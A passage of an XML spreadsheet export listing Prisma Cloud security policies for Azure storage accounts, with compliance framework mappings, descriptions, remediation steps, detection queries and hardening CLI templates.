https://learn.microsoft.com/en-us/azure/storage/common/infrastructure-encryption-enable
NOTE: Using Infrastructure double encryption will have performance impact on the read and write speeds of Azure storage accounts due to the additional encryption process.</t>
        </is>
      </c>
      <c r="Y2459" t="inlineStr"/>
      <c r="Z2459" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-storage-account-list' AND json.rule = properties.provisioningState equal ignore case Succeeded and (properties.encryption.requireInfrastructureEncryption does not exist or properties.encryption.requireInfrastructureEncryption is false)</t>
        </is>
      </c>
      <c r="AA2459" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2459" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2459" t="inlineStr">
        <is>
          <t>PC-AZR-STO-996</t>
        </is>
      </c>
      <c r="AD2459" t="b">
        <v>1</v>
      </c>
      <c r="AE2459" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2459" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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59" t="inlineStr">
        <is>
          <t>4c0acb89-7e58-4e34-be1d-e72ecb480968</t>
        </is>
      </c>
      <c r="AI2459" t="inlineStr">
        <is>
          <t>e4a29e14-7c66-47d0-ad5f-d6f6be04beb9</t>
        </is>
      </c>
      <c r="AJ2459" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2459" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2460">
      <c r="A2460" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HIPAA, Azure Security Benchmark (v2), RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, NIST 800-53 Rev 5, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Copy of Azure Security Benchmark (v3), ITSG-33, Copy of ACSC Information Security Manual (ISM)-clone, CIS v1.3.0 (Azure), HITRUST v.9.4.2 [Deprecated], Matt's ATT&amp;ACK, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, jneytchev-fedramp-low, APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, NIST 800-53 Rev4, MITRE ATT&amp;CK v12, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, Microsoft Cloud Security Benchmark v1, CIS v1.5.0 (Azure) - Level 1, ISO 27002:2022, MTSBv2_Azure, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Fedramp (Low), CSA CCM v4.0.12, Copy of Azure Security Benchmark (v3), HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), ITSG-33, TX-RAMP Level 2, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, Fedramp (Moderate), CIS v1.4.0 (Azure), CyberSecurity Law of the People's Republic of China, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, TX-RAMP Level 1, Copy of Azure Security Benchmark (v3), Azure Security Benchmark (v3), CDC NIST 800-53 Rev4, TX-RAMP Level 1, TX-RAMP Level 2, Brazilian Data Protection Law (LGPD), Insurance Regulatory And Development Authority Of India, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ITSG-33, MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, CIS Controls v8, CyberSecurity Law of the People's Republic of China, Azure Security Benchmark (v3), ISO/IEC 27001:2022, SOC 2, kfirdaus AWS Account-CS, SOC 2, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), Azure Security Benchmark (v3), CIS Controls v7.1, CyberSecurity Law of the People's Republic of China, Secure Controls Framework (SCF) - 2022.2.1, SOC 2, ITSG-33, HIPAA, Australian Energy Sector Cyber Security Framework (AESCSF), Copy of Azure Security Benchmark (v3), HITRUST v.9.4.2 [Deprecated], Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, GDPR, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, SOC 2, PCI DSS v3.2.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS v2.0.0 (Azure) Level 1, kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), CIS v1.3.1 (Azure), DORA, TX-RAMP Level 2, ISO/IEC 27001:2022, testazure, ACSC Information Security Manual (ISM), Azure Security Benchmark (v3), kfirdaus AWS Account-CS, NIST 800-53 Rev 5, HIPAA, HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS v1.1 (Azure), Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2460" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2460" s="2" t="inlineStr"/>
      <c r="D2460" t="inlineStr"/>
      <c r="E2460" t="inlineStr"/>
      <c r="F2460" t="inlineStr"/>
      <c r="G2460" t="b">
        <v>1</v>
      </c>
      <c r="H24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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2460" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2460" t="inlineStr">
        <is>
          <t>Azure Storage account container storing activity logs is publicly accessible</t>
        </is>
      </c>
      <c r="L2460" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2460" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2460" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2460" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2460" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2460" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2460" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S2460" t="inlineStr"/>
      <c r="T2460" t="b">
        <v>1</v>
      </c>
      <c r="U2460" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2460" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2460" t="inlineStr">
        <is>
          <t>This policy identifies the Storage account containers containing the activity log export is publicly accessible. Allowing public access to activity log content may aid an adversary in identifying weaknesses in the affected account's use or configuration.</t>
        </is>
      </c>
      <c r="X2460" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to 'Storage accounts'
3. Select the reported storage account
4. Under 'Data storage' section, Select 'Containers'
5. Select the container named as 'insight-operational-logs'
6. Click on 'Change access level'
7. Set 'Public access level' to 'Private (no anonymous access)'
8. Click on 'OK' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/ensure-the-storage-container-storing-the-activity-logs-is-not-publicly-accessible
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/ensure-the-storage-container-storing-the-activity-logs-is-not-publicly-accessible</t>
        </is>
      </c>
      <c r="Y2460" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Storage/storageAccounts/write' permission. Successful execution disables public access in Azure storage account,
this disables anonymous/public read access to a container storing activity logs within Azure storage account",
'impact': 'Disables public access in Azure storage account',
'cliScriptTemplate': 'az resource update --ids $resourceId --set properties.allowBlobPublicAccess=false'</t>
        </is>
      </c>
      <c r="Z2460" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-storage-account-list' AND json.rule= publicContainersList[*] contains insights-operational-logs and (properties.allowBlobPublicAccess is true or properties.allowBlobPublicAccess does not exist) as X; config from cloud.resource where api.name = 'azure-monitor-log-profiles-list' as Y; filter'$.X.id contains $.Y.properties.storageAccountId'; show X;
{"category":"Logging","resourceTypes":["azurerm_storage_container","azurerm_monitor_activity_log_alert"]}</t>
        </is>
      </c>
      <c r="AA2460" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2460" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2460" t="inlineStr">
        <is>
          <t>PC-AZR-STO-484-CKV2_AZURE_8</t>
        </is>
      </c>
      <c r="AD2460" t="b">
        <v>1</v>
      </c>
      <c r="AE2460" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2460" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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0" t="inlineStr">
        <is>
          <t>8a2315b0-70b9-477b-bd5c-41cb92a7b726</t>
        </is>
      </c>
      <c r="AI2460" t="inlineStr">
        <is>
          <t>499c23da-b67f-441a-81e3-9fc0fd05ea75</t>
        </is>
      </c>
      <c r="AJ2460" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2460" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2461">
      <c r="A2461" t="inlineStr">
        <is>
          <t>HIPAA, CIS v1.3.1 (Azure), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, ISO 27002:2022, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CIS Controls v8, CIS Controls v8.1, Copy of Azure Security Benchmark (v3), CIS Controls v7.1, ISO/IEC 27002:2013, ITSG-33, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CRI Profile v1.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, jneytchev-fedramp-low, TX-RAMP Level 1, Fedramp (Low), ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, TX-RAMP Level 2, NIST SP 800-171 Revision 3, GDPR, Microsoft Cloud Security Benchmark v1, CIS v1.1 (Azure), CIS v2.0.0 (Azure) Level 2, DORA, Copy of ACSC Information Security Manual (ISM)-clone, CIS v1.4.0 (Azure), ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), CIS v1.3.0 (Azure), PCI DSS v4.0, NIST 800-53 Rev4, NIST CSF v2.0, CDC NIST 800-53 Rev4, CIS v2.1.0 (Azure) Level 2, NIST 800-53 Rev4, ISO/IEC 27018:2019, CRI Profile v2.0, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of Azure Security Benchmark (v3), MTSBv2_Azure, ISO/IEC 27017:2015, Azure Security Benchmark (v3), PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Insurance Regulatory And Development Authority Of India, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, Azure Security Benchmark (v3), NIST SP 800-171 Revision 3, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), CIS v1.5.0 (Azure) - Level 2, PCI DSS v4.0, HIPAA, Fedramp (Moderate), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, Azure Security Benchmark (v3), NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, CSA CCM v4.0.12, ISO/IEC 27002:2013, testazure, CRI Profile v2.0, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, CRI Profile v1.2.1, Azure Security Benchmark (v2), PCI DSS v4.0, NIST SP 800-171 Revision 2, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2461" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2461" s="2" t="inlineStr"/>
      <c r="D2461" t="inlineStr"/>
      <c r="E2461" t="inlineStr"/>
      <c r="F2461" t="inlineStr"/>
      <c r="G2461" t="b">
        <v>0</v>
      </c>
      <c r="H24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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2461" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2461" t="inlineStr">
        <is>
          <t>Azure Storage Account Container with activity log has BYOK encryption disabled</t>
        </is>
      </c>
      <c r="L2461" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2461" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2461" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2461" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2461" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2461" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2461" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2461" t="inlineStr"/>
      <c r="T2461" t="b">
        <v>0</v>
      </c>
      <c r="U2461" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2461" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2461" t="inlineStr">
        <is>
          <t>This policy identifies the Storage Accounts in which container with activity log has BYOK encryption disabled. Azure storage account with the activity logs being exported to container should use BYOK (Use Your Own Key) for encryption, which provides additional confidentiality controls on log data.</t>
        </is>
      </c>
      <c r="X2461" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to Storage accounts dashboard and Click on reported storage account
3. Under the Settings menu, click on Encryption
4. Select Customer Managed Keys
- Choose 'Enter key URI' and Enter 'Key URI'
OR
- Choose 'Select from Key Vault', Enter 'Key Vault' and 'Encryption Key'
5. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2461" t="inlineStr"/>
      <c r="Z2461" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-storage-account-list' as X; config from cloud.resource where api.name = 'azure-monitor-log-profiles-list' as Y; filter '($.X.properties.encryption.keySource does not equal "Microsoft.Keyvault" and $.X.properties.encryption.keyvaultproperties.keyname is not empty and $.X.properties.encryption.keyvaultproperties.keyversion is not empty and $.X.properties.encryption.keyvaultproperties.keyvaulturi is not empty and $.Y.properties.storageAccountId contains $.X.name)'; show X;</t>
        </is>
      </c>
      <c r="AA2461" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2461" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2461" t="inlineStr">
        <is>
          <t>PC-AZR-STO-523</t>
        </is>
      </c>
      <c r="AD2461" t="b">
        <v>1</v>
      </c>
      <c r="AE2461" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2461" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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1" t="inlineStr">
        <is>
          <t>217f8556-ccdb-4746-b4b7-2237298c81f1</t>
        </is>
      </c>
      <c r="AI2461" t="inlineStr">
        <is>
          <t>35b58abb-fd38-4ab0-8432-b17c4b994489</t>
        </is>
      </c>
      <c r="AJ2461" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2461" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2462">
      <c r="A2462" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27017:2015, APRA (CPS 234) Information Security, NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, Azure Security Benchmark (v2), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, NYDFS 23 CRR-NY 500.0, CIS v1.5.0 (Azure) - Level 1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS v2.1.0 (Azure) Level 1, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27017:2015, Copy of CIS v1.2.0 (Azure), CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, Copy of Azure Security Benchmark (v3), Matt's ATT&amp;ACK, CIS v2.0.0 (Azure) Level 1, HITRUST v.9.4.2 [Deprecated], APRA (CPS 234) Information Security, CIS v1.3.0 (Azure), Fedramp (Moderate), CIS v1.3.1 (Azure), CIS v1.1 (Azure), MITRE ATT&amp;CK v12, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v4.0.12, NIST 800-53 Rev4, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, NIST 800-53 Rev 5, ISO/IEC 27017:2015, Copy of CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Azure Security Benchmark (v3), PCI DSS v3.2.1, ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, NIST 800-53 Rev 5, CIS Controls v8, testazure, NIST 800-53 Rev4, NIST CSF, NIST SP 800-172, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Fedramp (Moderate), Insurance Regulatory And Development Authority Of India, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CIS v1.4.0 (Azure), CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, kashan ACSC Information Security Manual (ISM), Telecommunications Security Act - TSA, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), ISO/IEC 27017:2015, Azure Security Benchmark (v2), CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, MTSBv2_Azure, NIST 800-53 Rev4, NIST 800-53 Rev 5, ISO/IEC 27002:2013, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2022.2.1, CIS v1.2.0 (Azure), NIST 800-53 Rev4, ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CyberSecurity Law of the People's Republic of China, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), NIST SP 800-171 Revision 2, CIS Controls v7.1, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2462" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2462" s="2" t="inlineStr"/>
      <c r="D2462" t="inlineStr"/>
      <c r="E2462" t="inlineStr"/>
      <c r="F2462" t="inlineStr"/>
      <c r="G2462" t="b">
        <v>1</v>
      </c>
      <c r="H24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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2462" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2462" t="inlineStr">
        <is>
          <t>Azure Storage Account default network access is set to 'Allow'</t>
        </is>
      </c>
      <c r="L2462" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2462" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2462" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2462" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2462" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2462" t="inlineStr">
        <is>
          <t>AC-1</t>
        </is>
      </c>
      <c r="R2462" t="inlineStr">
        <is>
          <t>AC-17 (2)</t>
        </is>
      </c>
      <c r="S2462" t="inlineStr">
        <is>
          <t>Attack Path Rule,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2462" t="b">
        <v>1</v>
      </c>
      <c r="U2462" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2462" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2462" t="inlineStr">
        <is>
          <t>This policy identifies Storage accounts which have default network access is set to 'Allow'. Restricting default network access helps to provide a new layer of security, since storage accounts accept connections from clients on any network. To limit access to selected networks, the default action must be changed.</t>
        </is>
      </c>
      <c r="X2462" t="inlineStr">
        <is>
          <t>To change the default network access rule, follow below URL:
https://learn.microsoft.com/en-us/azure/storage/common/storage-network-security?tabs=azure-portal#change-the-default-network-access-rule 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/set-default-network-access-rule-for-storage-accounts-to-deny
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/set-default-network-access-rule-for-storage-accounts-to-deny</t>
        </is>
      </c>
      <c r="Y2462" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Storage/storageAccounts/*' permission. Successful execution will disable default network access rule for Storage Accounts.'.",
'impact': 'disables default-action in Azure Storage Account network access',
'cliScriptTemplate': 'az storage account update --name $resourceName --resource-group $resourceGroup --default-action Deny'</t>
        </is>
      </c>
      <c r="Z2462" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-storage-account-list' AND json.rule = 'networkRuleSet.defaultAction equals Allow'
{"category":"Networking","resourceTypes":["azurerm_storage_account","azurerm_storage_account_network_rules"]}</t>
        </is>
      </c>
      <c r="AA2462" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2462" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2462" t="inlineStr">
        <is>
          <t>PC-AZR-STO-404-CKV_AZURE_35</t>
        </is>
      </c>
      <c r="AD2462" t="b">
        <v>1</v>
      </c>
      <c r="AE2462" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2462" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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2" t="inlineStr">
        <is>
          <t>991aca47-286f-45be-8737-ff9c069beab6</t>
        </is>
      </c>
      <c r="AI2462" t="inlineStr">
        <is>
          <t>0c8ba0ca-2414-4d62-897c-4b57a291ae2b</t>
        </is>
      </c>
      <c r="AJ2462" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2462" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2463">
      <c r="A2463" t="inlineStr">
        <is>
          <t>HIPAA, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, GDPR, TX-RAMP Level 2, CSA CCM v4.0.12, SOC 2, CSA CCM v4.0.12, HIPAA, HIPAA, ITSG-33, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2463" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2463" s="2" t="inlineStr"/>
      <c r="D2463" t="inlineStr"/>
      <c r="E2463" t="inlineStr"/>
      <c r="F2463" t="inlineStr"/>
      <c r="G2463" t="b">
        <v>1</v>
      </c>
      <c r="H24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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2463" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2463" t="inlineStr">
        <is>
          <t>Azure Storage account configured with Shared Key authorization</t>
        </is>
      </c>
      <c r="L2463" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2463" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2463" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2463" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2463" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2463" t="inlineStr">
        <is>
          <t>DSP</t>
        </is>
      </c>
      <c r="R2463" t="inlineStr">
        <is>
          <t>DSP-17</t>
        </is>
      </c>
      <c r="S2463" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2463" t="b">
        <v>0</v>
      </c>
      <c r="U2463" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2463" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2463" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage accounts configured with Shared Key authorization.
Azure Storage accounts authorized with Shared Key authorization via Shared Access Signature (SAS) tokens pose a security risk, as they allow sharing information with external unidentified identities. It is highly recommended to disable Shared Key authorization and Use Azure AD authorization as it provides superior security and ease of use over Shared Key.
For more details:
https://learn.microsoft.com/en-us/azure/storage/common/shared-key-authorization-prevent</t>
        </is>
      </c>
      <c r="X2463" t="inlineStr">
        <is>
          <t>To prevent Shared Key authorization for an Azure Storage account, follow bellow URL:
https://learn.microsoft.com/en-us/azure/storage/common/shared-key-authorization-prevent 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/bc-azure-2-40
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/bc-azure-2-40</t>
        </is>
      </c>
      <c r="Y2463" t="inlineStr"/>
      <c r="Z2463" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name= 'azure-storage-account-list' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.allowSharedKeyAccess is true
{"category":"IAM","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA2463" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2463" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2463" t="inlineStr">
        <is>
          <t>PC-AZR-STO-1071-CKV2_AZURE_40</t>
        </is>
      </c>
      <c r="AD2463" t="b">
        <v>1</v>
      </c>
      <c r="AE2463" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2463" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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3" t="inlineStr">
        <is>
          <t>f5c4ddc4-52fc-4c52-9a60-5c40b845a683</t>
        </is>
      </c>
      <c r="AI2463" t="inlineStr">
        <is>
          <t>64bd7f84-5afb-48b5-adb0-fbe55dcfec08</t>
        </is>
      </c>
      <c r="AJ2463" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2463" t="inlineStr">
        <is>
